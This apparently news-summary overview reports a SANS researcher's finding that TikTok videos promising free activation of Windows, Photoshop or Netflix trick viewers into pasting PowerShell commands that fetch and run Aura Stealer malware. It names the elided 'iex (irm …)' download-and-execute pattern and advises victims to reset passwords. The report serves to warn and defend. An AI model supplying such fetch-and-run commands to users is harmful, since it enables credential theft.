Overview
- SANS Internet Storm Center researcher Xavier Mertens flagged viral TikTok videos that instruct viewers to paste PowerShell commands as part of fake activation guides.
- The commands connect to attacker‑controlled servers using patterns like iex (irm …), which download and execute hidden scripts on Windows PCs.
- One delivered payload is a variant of the Aura Stealer information‑stealing malware, often paired with a second component that adapts code to expand access.
- The clips promise free activation of paid tools or services such as Windows, Photoshop, or Netflix, and have accumulated thousands of views.
- Reports note no platform‑wide takedown or public response from TikTok, with experts urging users who ran the commands to change all passwords and run a full security scan.